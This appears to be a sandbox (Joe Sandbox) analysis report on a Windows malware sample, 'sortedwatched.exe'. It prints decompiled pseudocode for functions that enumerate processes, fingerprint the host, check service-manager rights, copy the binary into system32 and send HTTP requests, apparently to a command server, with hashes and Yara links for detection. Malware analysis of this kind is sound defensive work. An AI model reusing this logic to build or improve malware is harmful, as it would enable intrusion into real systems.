                  • API ID: File$CloseHandle$CreateNameView_snwprintf$ByteCharComputeComputerCrc32DeleteFolderManagerMappingModuleMultiOpenPathServiceSizeUnmapWide_snprintflstrcmpi
                  • String ID: C:\Windows\system32\sortedwatched.exe$C:\Windows\system32\sortedwatched.exe
                  • API String ID: 2225404385-3820085027
                  • Opcode ID: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction ID: bd7696f8d282200fc694e3ca5d6ba9f1d35f343fb67aa0c3943ac94685ea35c3
                  • Opcode Fuzzy Hash: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction Fuzzy Hash: 29F08232619501A6D634B7F7B8067CB12855F81319B16847FF440B5DD2DE3C884A856E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C84E, Relevance: 4.5, APIs: 3, Instructions: 30synchronizationUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040C84E(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				signed int _t6;
				long _t9;
				void* _t12;
				void* _t17;
				signed int _t19;
				void* _t24;

				_t24 = __eflags;
				_t17 = __edi;
				_t12 = __ebx;
				_t6 = GetTickCount();
				_t16 = _t6 % 0xfa0;
				_t19 = _t6 % 0xfa0; // executed
				E0040C493(); // executed
				_t9 = E0040C601(_t24);
				if(_t9 != 0) {
					_t5 = _t19 + 0xfa0; // 0xfa0
					_t9 = WaitForSingleObject( *0x414e6c, _t5);
					while(_t9 == 0x102) {
						_t9 = WaitForSingleObject( *0x414e6c, E0040C78F(_t12, _t16, _t17));
					}
				}
				return _t9;
			}









                  0x0040c84e
                  0x0040c84e
                  0x0040c84e
                  0x0040c856
                  0x0040c863
                  0x0040c865
                  0x0040c867
                  0x0040c86c
                  0x0040c873
                  0x0040c875
                  0x0040c882
                  0x0040c8a1
                  0x0040c89b
                  0x0040c89b
                  0x0040c8a1
                  0x0040c8a9

                  APIs
                  • GetTickCount.KERNEL32(00000000,?,?,0040F111), ref: 0040C856
                    • Part of subcall function 0040C493: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C4A8
                    • Part of subcall function 0040C493: GetVolumeInformationW.KERNEL32(?,00000000,00000000,00415488,00000000,00000000,00000000,00000000), ref: 0040C4EB
                    • Part of subcall function 0040C601: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040C615
                    • Part of subcall function 0040C601: SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 0040C649
                    • Part of subcall function 0040C601: ResetEvent.KERNEL32(?,?,0040F111), ref: 0040C65D
                    • Part of subcall function 0040C601: ReleaseMutex.KERNEL32(?,?,0040F111), ref: 0040C66B
                    • Part of subcall function 0040C601: CloseHandle.KERNEL32 ref: 0040C677
                  • WaitForSingleObject.KERNEL32(00000FA0), ref: 0040C882
                  • WaitForSingleObject.KERNEL32(00000000), ref: 0040C89B
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: ObjectWait$Single$CloseCountDirectoryEventHandleInformationMutexReleaseResetSignalTickVolumeWindows
                  • String ID:
                  • API String ID: 1052563600-0
                  • Opcode ID: 0633e936a088fcb8b38c62daec32763aaef1651ac7ccb6cf648d26e93326d8c7
                  • Instruction ID: c69442cc489c2c4f0668fa5bec6b92153ca26a26e28d5911284e54d6033ab6a8
                  • Opcode Fuzzy Hash: 0633e936a088fcb8b38c62daec32763aaef1651ac7ccb6cf648d26e93326d8c7
                  • Instruction Fuzzy Hash: 89E0E532500101DBE7207BB1AC894BA7299EB85312F14C376FC59E22E4DE798D1096EE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004022D2, Relevance: 3.8, APIs: 3, Instructions: 83stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004022D2(intOrPtr* __ecx) {
				void* _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr _t35;
				int _t38;
				intOrPtr* _t39;
				intOrPtr* _t40;
				signed int _t41;
				intOrPtr* _t47;
				short _t48;
				signed int _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				WCHAR* _t62;

				_t39 = __ecx;
				_v16 = __ecx;
				_t26 = __ecx + 4;
				_v8 = 0;
				_v12 = 0;
				_t55 = 0;
				 *__ecx = 0;
				_v20 = _t26;
				 *_t26 = 0; // executed
				E00401943( &_v8); // executed
				_t59 = _v8;
				if(_t59 != 0) {
					_t41 = 0;
					do {
						_t8 = _t59 + 4; // 0x40c6d8
						_t38 = lstrlenW(_t8);
						_t59 =  *_t59;
						_t41 = _t41 + 1 + _t38;
					} while (_t59 != 0);
					_v12 = _t41;
					_t39 = _v16;
				}
				_t28 = E004014F2(_v12 + _v12);
				_v12 = _t28;
				if(_t28 != 0) {
					_t40 = _v8;
					while(_t40 != 0) {
						_t14 = _t40 + 4; // 0x40c6d8
						_t62 = _t14;
						lstrcpyW(_t28 + _t55 * 2, _t62);
						_t57 = _t55 + lstrlenW(_t62);
						_t28 = _v12;
						_t48 = 0x2c;
						 *((short*)(_t28 + _t57 * 2)) = _t48;
						_t55 = _t57 + 1;
						_t40 =  *_t40;
					}
					_t35 = E00402424(_t28, _t55, _v20);
					_t39 = _v16;
					 *_t39 = _t35;
					E00401532(_v12);
				}
				_t47 = _v8;
				if(_t47 != 0) {
					do {
						_t61 =  *_t47;
						E00401532(_t47);
						_t47 = _t61;
					} while (_t61 != 0);
				}
				return 0 |  *_t39 != 0x00000000;
			}





















                  0x004022d9
                  0x004022e0
                  0x004022e5
                  0x004022e8
                  0x004022eb
                  0x004022ee
                  0x004022f0
                  0x004022f2
                  0x004022f5
                  0x004022f7
                  0x004022fc
                  0x00402301
                  0x00402303
                  0x00402305
                  0x00402305
                  0x00402309
                  0x0040230f
                  0x00402312
                  0x00402314
                  0x00402318
                  0x0040231b
                  0x0040231b
                  0x00402323
                  0x00402328
                  0x0040232d
                  0x0040232f
                  0x00402358
                  0x00402334
                  0x00402334
                  0x0040233c
                  0x00402349
                  0x0040234b
                  0x00402350
                  0x00402351
                  0x00402355
                  0x00402356
                  0x00402356
                  0x00402362
                  0x00402367
                  0x0040236f
                  0x00402371
                  0x00402371
                  0x00402376
                  0x0040237b
                  0x0040237d
                  0x0040237d
                  0x0040237f
                  0x00402384
                  0x00402386
                  0x0040237d
                  0x00402397

                  APIs
                    • Part of subcall function 00401943: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401954
                    • Part of subcall function 00401943: Process32FirstW.KERNEL32(00000000,?), ref: 00401973
                    • Part of subcall function 00401943: CloseHandle.KERNEL32(00000000), ref: 0040199F
                  • lstrlenW.KERNEL32(0040C6D8,00000000,000CD140,00000104,?,?,?,0040C6D4), ref: 00402309
                  • lstrcpyW.KERNEL32(00000000,0040C6D8), ref: 0040233C
                  • lstrlenW.KERNEL32(0040C6D8,?,?,?,0040C6D4), ref: 00402343
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$CloseCreateFirstHandleProcess32SnapshotToolhelp32lstrcpy
                  • String ID:
                  • API String ID: 17659468-0
                  • Opcode ID: 9b1a24f769ae4d82b2c2dcec2bffea6d6a32330a0e616b71de6e0109279ee6a3
                  • Instruction ID: a1b1e07c88102afd1e208d79554f5a107a99b0a779c10993015063021bd553f4
                  • Opcode Fuzzy Hash: 9b1a24f769ae4d82b2c2dcec2bffea6d6a32330a0e616b71de6e0109279ee6a3
                  • Instruction Fuzzy Hash: 7D217E71A04214EBCB24DFA4D58499EBBB4EF48310B1440BED905EB391DB78AE00CB58
                  Uniqueness

                  Uniqueness Score: 0.04%

                  Function 00406104, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E00406104(void* __eflags, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				signed int* _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				char _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				char _v1212;
				char _v2236;
				intOrPtr _t42;
				void* _t48;
				void* _t50;
				void* _t55;
				void* _t61;
				signed int _t66;
				signed int _t68;
				intOrPtr _t73;
				void* _t86;
				signed char* _t99;
				signed int* _t106;
				intOrPtr _t107;

				_t3 = _a4 + 4; // 0xff00414e
				_v24 = 0x10;
				_t42 = E00405E88( *_a4,  *_t3, __eflags,  &_v16); // executed
				_t106 = _a8;
				_t107 = _t42;
				_v20 = _t107;
				 *_t106 =  *_t106 & 0x00000000;
				_t106[1] = _t106[1] & 0x00000000;
				_t73 =  *0x41652c + 1;
				 *0x41652c = _t73;
				_t113 = _t107;
				if(_t107 != 0) {
					if(E004062D8( &_v32,  &_v24, _t113) != 0) {
						_t48 = E0040207B( &_v32,  &_v40);
						_t115 = _t48;
						if(_t48 != 0) {
							_t50 = E00401A52(0x412270, 0x680f9b3);
							_t99 =  *0x416524;
							 *0x4143a4( &_v180, 0x40, _t50, _t99[3] & 0x000000ff, _t99[2] & 0x000000ff, _t99[1] & 0x000000ff,  *_t99 & 0x000000ff);
							L00401B09(_t50);
							_t55 = E00405FA4( &_v180,  &_v40, _t115,  &_v2236);
							_pop(_t86);
							_t116 = _t55;
							if(_t55 != 0) {
								_t61 = E0040140A( &_v180, ( *0x416524)[4], _t116,  &_v2236,  &_v1212, _t86, _v188, _v184,  &_v48); // executed
								if(_t61 != 0) {
									if(E0040215A( &_v180,  &_v48,  &_v12) != 0) {
										_t92 = _v12;
										_t30 =  &(_t106[1]); // 0x40c700
										_t103 = _t30;
										_t66 =  *_v12;
										 *_t30 = _t66;
										if(_t66 < 0x1000000) {
											_t68 = E00405ED3( &(_t92[1]), _v8 - 4, _t103);
											_t92 = _v12;
											 *_t106 = _t68;
										}
										E00401532(_t92);
									}
									E00401532(_v48);
								}
								E004060BA( &_v2236);
							}
							E00401532(_v40);
							_t107 = _v20;
						}
						E00401532(_v32);
					}
					E00401532(_t107);
					_t73 =  *0x41652c;
				}
				_t74 =  !=  ? 0 : _t73;
				 *0x41652c =  !=  ? 0 : _t73;
				return 0 |  *_t106 != 0x00000000;
			}




























                  0x00406116
                  0x0040611b
                  0x00406122
                  0x00406127
                  0x0040612a
                  0x0040612d
                  0x00406130
                  0x00406133
                  0x0040613d
                  0x0040613e
                  0x00406144
                  0x00406146
                  0x00406159
                  0x00406166
                  0x0040616c
                  0x0040616e
                  0x0040617e
                  0x00406183
                  0x004061a8
                  0x004061b3
                  0x004061c8
                  0x004061cd
                  0x004061ce
                  0x004061d0
                  0x00406204
                  0x0040620e
                  0x0040621f
                  0x00406221
                  0x00406224
                  0x00406224
                  0x00406227
                  0x00406229
                  0x00406230
                  0x0040623c
                  0x00406242
                  0x00406245
                  0x00406245
                  0x00406247
                  0x00406247
                  0x0040624f
                  0x0040624f
                  0x0040625a
                  0x0040625a
                  0x00406262
                  0x00406267
                  0x00406267
                  0x0040626d
                  0x0040626d
                  0x00406274
                  0x00406279
                  0x00406279
                  0x00406283
                  0x00406286
                  0x00406296

                  APIs
                  • _snwprintf.NTDLL ref: 004061A8
                    • Part of subcall function 00405FA4: _snwprintf.NTDLL ref: 00406000
                    • Part of subcall function 00405FA4: GetTickCount.KERNEL32 ref: 00406042
                    • Part of subcall function 0040140A: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000,0040C6FC,00000000,00000104,?,?,?), ref: 00401429
                    • Part of subcall function 0040140A: InternetConnectW.WININET(00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00401445
                    • Part of subcall function 0040140A: HttpSendRequestW.WININET(00000000,000000FF,000000FF,?,?), ref: 0040149F
                    • Part of subcall function 0040140A: InternetCloseHandle.WININET(00000000), ref: 004014C7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$_snwprintf$CloseConnectCountHandleHttpOpenRequestSendTick
                  • String ID: g8Cw
                  • API String ID: 696445947-3103284439
                  • Opcode ID: 330aba8408174432a22468a66f18df5f331fc659532ddb7950c23e4088fe1013
                  • Instruction ID: a199245709a9ee0ab4ea84b2f4d67a79545613f660e739969ce5274ddc5caeb1
                  • Opcode Fuzzy Hash: 330aba8408174432a22468a66f18df5f331fc659532ddb7950c23e4088fe1013
                  • Instruction Fuzzy Hash: CB41A57190011ADBCB14EB65D850AEEB7B9FF48304F1081BEE446B7295EB34AE45CF98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F214, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,C:\Windows\system32), ref: 0040F220
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath
                  • String ID: C:\Windows\system32
                  • API String ID: 1514166925-2896066436
                  • Opcode ID: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction ID: 5dcbbc3557999cadc85141e505fa9820d1d618d2a08e95aef40471cc6c79aa6f
                  • Opcode Fuzzy Hash: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction Fuzzy Hash: EBB011E0B80200BEFE000230AE0EEB3200CCB80B00F2288203E00E0080EAA8C88082B8
                  Uniqueness

                  Uniqueness Score: 0.19%

                  Function 0040C78F, Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0040C78F(void* __ebx, void* __edx, void* __edi) {
				void* __ecx;
				intOrPtr _t6;
				intOrPtr _t7;
				signed int _t10;
				void* _t15;
				signed int _t21;
				signed int _t23;
				void* _t24;
				void* _t25;
				void* _t29;
				void* _t32;
				void* _t34;

				_t34 = __edx;
				_t6 =  *0x415484; // 0x0
				_t7 = _t6;
				if(_t7 == 0) {
					E0040632A(__eflags); // executed
					E004076C6(__eflags); // executed
					_t10 = E0040F92D(__ebx, _t29, _t34, __edi, __eflags);
					__eflags = _t10;
					if(_t10 != 0) {
						goto L12;
					} else {
						 *0x415484 = 1;
						goto L11;
					}
				} else {
					_t15 = _t7 - 1;
					if(_t15 == 0) {
						E00408922(__eflags); // executed
						E00408CD5(__eflags); // executed
						E00409BFD(__eflags);
						E0040A2C9(__eflags); // executed
						E0040B6B5(__eflags); // executed
						_push(_t29);
						_t21 = E004060C5();
						_t32 = _t29;
						__eflags = _t21;
						if(_t21 == 0) {
							L12:
							 *0x415484 = 3;
							goto L13;
						} else {
							_push(_t32);
							_t23 = E0040FCD8(E0040FA9B());
							__eflags = _t23;
							if(_t23 == 0) {
								goto L12;
							} else {
								 *0x415484 = 2;
								L11:
								_t2 = GetTickCount() % 0xfa0;
								__eflags = _t2;
								return 0xfa0 + _t2;
							}
						}
					} else {
						_t24 = _t15 - 1;
						if(_t24 == 0) {
							 *0x415484 = 2; // executed
							_t25 = E0040C682(__edi, __eflags); // executed
							return _t25; // executed
						} else {
							if(_t24 == 1) {
								SetEvent( *0x414e6c);
							}
							L13:
							return 0;
						}
					}
				}
			}















                  0x0040c78f
                  0x0040c790
                  0x0040c795
                  0x0040c798
                  0x0040c80f
                  0x0040c814
                  0x0040c819
                  0x0040c81e
                  0x0040c820
                  0x00000000
                  0x0040c822
                  0x0040c822
                  0x00000000
                  0x0040c822
                  0x0040c79a
                  0x0040c79a
                  0x0040c79b
                  0x0040c7c9
                  0x0040c7ce
                  0x0040c7d3
                  0x0040c7d8
                  0x0040c7dd
                  0x0040c7e2
                  0x0040c7e4
                  0x0040c7ea
                  0x0040c7eb
                  0x0040c7ed
                  0x0040c840
                  0x0040c840
                  0x00000000
                  0x0040c7ef
                  0x0040c7ef
                  0x0040c7f7
                  0x0040c7ff
                  0x0040c801
                  0x00000000
                  0x0040c803
                  0x0040c803
                  0x0040c82c
                  0x0040c839
                  0x0040c839
                  0x0040c83f
                  0x0040c83f
                  0x0040c801
                  0x0040c79d
                  0x0040c79d
                  0x0040c79e
                  0x0040c7b8
                  0x0040c7c2
                  0x0040c7c8
                  0x0040c7a0
                  0x0040c7a1
                  0x0040c7ad
                  0x0040c7ad
                  0x0040c84a
                  0x0040c84d
                  0x0040c84d
                  0x0040c79e
                  0x0040c79b

                  APIs
                  • SetEvent.KERNEL32(?,0040C894,?,?,0040F111), ref: 0040C7AD
                  • GetTickCount.KERNEL32(?,0040C894,?,?,0040F111), ref: 0040C82C
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountEventTick
                  • String ID:
                  • API String ID: 180926312-0
                  • Opcode ID: 69affc29043669191e381e6b1b6223cf0c3bd66907fecb4a49175b6604a6839f
                  • Instruction ID: be868de2910ec1a5e810c43775452dbe779e15a4cf7b5af956ef61f3f0da2497
                  • Opcode Fuzzy Hash: 69affc29043669191e381e6b1b6223cf0c3bd66907fecb4a49175b6604a6839f
                  • Instruction Fuzzy Hash: 3D0196B1514502C9E7147BB5A94A3AB3658AB8031EF10C23FA402B56D3EF3D8454952E
                  Uniqueness

                  Uniqueness Score: 2.98%

                  Function 0040F92D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34stringUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F92D(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				intOrPtr _t1;
				int _t9;
				intOrPtr _t16;
				void* _t20;
				void* _t24;

				_t24 = __eflags;
				_t20 = __edx;
				_t16 = __ecx;
				_t1 =  *0x415488; // 0x3c4e0000
				 *0x4164e0 = _t1;
				E0040F16B();
				E0040F149();
				E0040F26C();
				E0040F292();
				E0040F3C5(); // executed
				E0040F43E(__ebx); // executed
				E0040F2EE(_t24); // executed
				_t9 = lstrcmpiW(0x416c50, 0x416840);
				if(_t9 != 0) {
					E0040F63A(_t16, _t20, __edi, __eflags);
					__eflags =  *0x415f4c;
					if( *0x415f4c == 0) {
						__eflags = 0;
						E00401CC2(0x416840, 0, _t16, 0);
					} else {
						E0040F7A0();
					}
					__eflags = 1;
					return 1;
				} else {
					return _t9;
				}
			}








                  0x0040f92d
                  0x0040f92d
                  0x0040f92d
                  0x0040f92d
                  0x0040f933
                  0x0040f938
                  0x0040f93d
                  0x0040f942
                  0x0040f947
                  0x0040f94c
                  0x0040f951
                  0x0040f956
                  0x0040f966
                  0x0040f96e
                  0x0040f972
                  0x0040f977
                  0x0040f97e
                  0x0040f98a
                  0x0040f98e
                  0x0040f980
                  0x0040f980
                  0x0040f980
                  0x0040f997
                  0x0040f999
                  0x0040f971
                  0x0040f971
                  0x0040f971

                  APIs
                    • Part of subcall function 0040F16B: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,0040F93D,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F174
                    • Part of subcall function 0040F16B: CloseServiceHandle.ADVAPI32(00000000,?,0040C894,?,?,0040F111), ref: 0040F189
                    • Part of subcall function 0040F149: GetModuleFileNameW.KERNEL32(00000000,00416C50,00000104,00000000,00000102,0040F942,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F162
                    • Part of subcall function 0040F292: _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F3C5: CreateFileW.KERNEL32(00416C50,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                    • Part of subcall function 0040F3C5: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                    • Part of subcall function 0040F3C5: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                    • Part of subcall function 0040F3C5: GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                    • Part of subcall function 0040F3C5: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                    • Part of subcall function 0040F3C5: UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                    • Part of subcall function 0040F3C5: CloseHandle.KERNEL32(00000000), ref: 0040F42D
                    • Part of subcall function 0040F3C5: CloseHandle.KERNEL32(00000000), ref: 0040F434
                    • Part of subcall function 0040F43E: GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                    • Part of subcall function 0040F43E: WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                    • Part of subcall function 0040F43E: _snprintf.NTDLL ref: 0040F4EF
                    • Part of subcall function 0040F2EE: _snwprintf.NTDLL ref: 0040F3A1
                    • Part of subcall function 0040F2EE: DeleteFileW.KERNEL32(?), ref: 0040F3B8
                  • lstrcmpiW.KERNEL32(00416C50,00416840,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F966
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandle$CreateNameView_snwprintf$ByteCharComputeComputerCrc32DeleteManagerMappingModuleMultiOpenServiceSizeUnmapWide_snprintflstrcmpi
                  • String ID: @hA
                  • API String ID: 260064074-589612155
                  • Opcode ID: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction ID: bd7696f8d282200fc694e3ca5d6ba9f1d35f343fb67aa0c3943ac94685ea35c3
                  • Opcode Fuzzy Hash: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction Fuzzy Hash: 29F08232619501A6D634B7F7B8067CB12855F81319B16847FF440B5DD2DE3C884A856E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C493, Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040C493() {
				short _v524;
				int _t7;
				intOrPtr* _t8;
				int _t10;

				_t7 = GetWindowsDirectoryW( &_v524, 0x104);
				if(_t7 != 0) {
					_t8 =  &_v524;
					if(_v524 == 0) {
						L6:
						_t10 = GetVolumeInformationW( &_v524, 0, 0, 0x415488, 0, 0, 0, 0); // executed
						return _t10;
					}
					while( *_t8 != 0x5c) {
						_t8 = _t8 + 2;
						if( *_t8 != 0) {
							continue;
						}
						goto L6;
					}
					 *((short*)(_t8 + 2)) = 0;
					goto L6;
				}
				return _t7;
			}







                  0x0040c4a8
                  0x0040c4b0
                  0x0040c4b4
                  0x0040c4c1
                  0x0040c4d9
                  0x0040c4eb
                  0x00000000
                  0x0040c4eb
                  0x0040c4c3
                  0x0040c4c9
                  0x0040c4cf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040c4d1
                  0x0040c4d5
                  0x00000000
                  0x0040c4d5
                  0x0040c4f4

                  APIs
                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C4A8
                  • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00415488,00000000,00000000,00000000,00000000), ref: 0040C4EB
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: DirectoryInformationVolumeWindows
                  • String ID:
                  • API String ID: 3487004747-0
                  • Opcode ID: d551ca3e1d6bdfe1e2032ad98836d5a1be74920f70889b0d4aca8ac5e3ea59a8
                  • Instruction ID: 6df482a4064c3c314c9bc21c7ed919fd71dc62a834def3a9c54a892a1779e89a
                  • Opcode Fuzzy Hash: d551ca3e1d6bdfe1e2032ad98836d5a1be74920f70889b0d4aca8ac5e3ea59a8
                  • Instruction Fuzzy Hash: 41F0B461840304EADB60AB609C99EF7727CFB90701F04C2BBE446A31A0EA748EC04669
                  Uniqueness

                  Uniqueness Score: 0.11%

                  Function 00402398, Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                  Download Yara Rule
                  APIs
                  • RtlGetVersion.NTDLL(?), ref: 004023B2
                  • GetNativeSystemInfo.KERNEL32(?), ref: 004023BC
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoNativeSystemVersion
                  • String ID:
                  • API String ID: 2296905803-0
                  • Opcode ID: f500d454982887d195b2059825262a2c8c9dbe5e898991a128f4e8882e8388d5
                  • Instruction ID: a371f979de9dee7b635f4db02bf44c25b34ee49e7ea891550d89514103cf8198
                  • Opcode Fuzzy Hash: f500d454982887d195b2059825262a2c8c9dbe5e898991a128f4e8882e8388d5
                  • Instruction Fuzzy Hash: 0BE0EDB2D0421D8BCB14DB62ED4AADCBBFCEB68305F0401F1E909FA151E734DB548A64
                  Uniqueness

                  Uniqueness Score: 0.02%

                  Function 0040F16B, Relevance: 3.0, APIs: 2, Instructions: 10serviceCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F16B() {
				void* _t1;
				int _t2;

				_t1 = OpenSCManagerW(0, 0, 0xf003f); // executed
				if(_t1 != 0) {
					 *0x415f4c = 1; // executed
					_t2 = CloseServiceHandle(_t1); // executed
					return _t2;
				}
				return _t1;
			}





                  0x0040f174
                  0x0040f17c
                  0x0040f17f
                  0x0040f189
                  0x00000000
                  0x0040f189
                  0x0040f18f

                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,0040F93D,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F174
                  • CloseServiceHandle.ADVAPI32(00000000,?,0040C894,?,?,0040F111), ref: 0040F189
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleManagerOpenService
                  • String ID:
                  • API String ID: 1199824460-0
                  • Opcode ID: 328b80631a7d1405865ec1f2d27f3b53a49fc41852bb4fe2dd5b1e2aa201f722
                  • Instruction ID: 2df2e35fa660732f6bf37a98dc022a26ca5b34ae0ab37706f3e31856a2e9695e
                  • Opcode Fuzzy Hash: 328b80631a7d1405865ec1f2d27f3b53a49fc41852bb4fe2dd5b1e2aa201f722
                  • Instruction Fuzzy Hash: 36C04CB0340301AEEB749F51DE09BA53998AB44B42F008074A60DE95D5CBF44406DA2D
                  Uniqueness

                  Uniqueness Score: 0.02%

                  Function 00401345, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                  Download Yara Rule
                  C-Code - Quality: 16%
                  			E00401345() {
				char _v8;
				char _v1032;
				void* _t7;

				_v8 = 0x400;
				_t7 =  *0x415414(0,  &_v1032,  &_v8); // executed
				if(_t7 < 0) {
					return 0;
				}
				_push(_t10);
				return E004023E5( &_v1032);
			}






                  0x00401351
                  0x00401362
                  0x0040136a
                  0x00000000
                  0x0040137d
                  0x0040136d
                  0x00000000

                  APIs
                  • ObtainUserAgentString.URLMON(00000000,?,00000104), ref: 00401362
                    • Part of subcall function 004023E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,0040C6FC,00000000,00000000,00401379), ref: 004023F5
                    • Part of subcall function 004023E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00402418
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
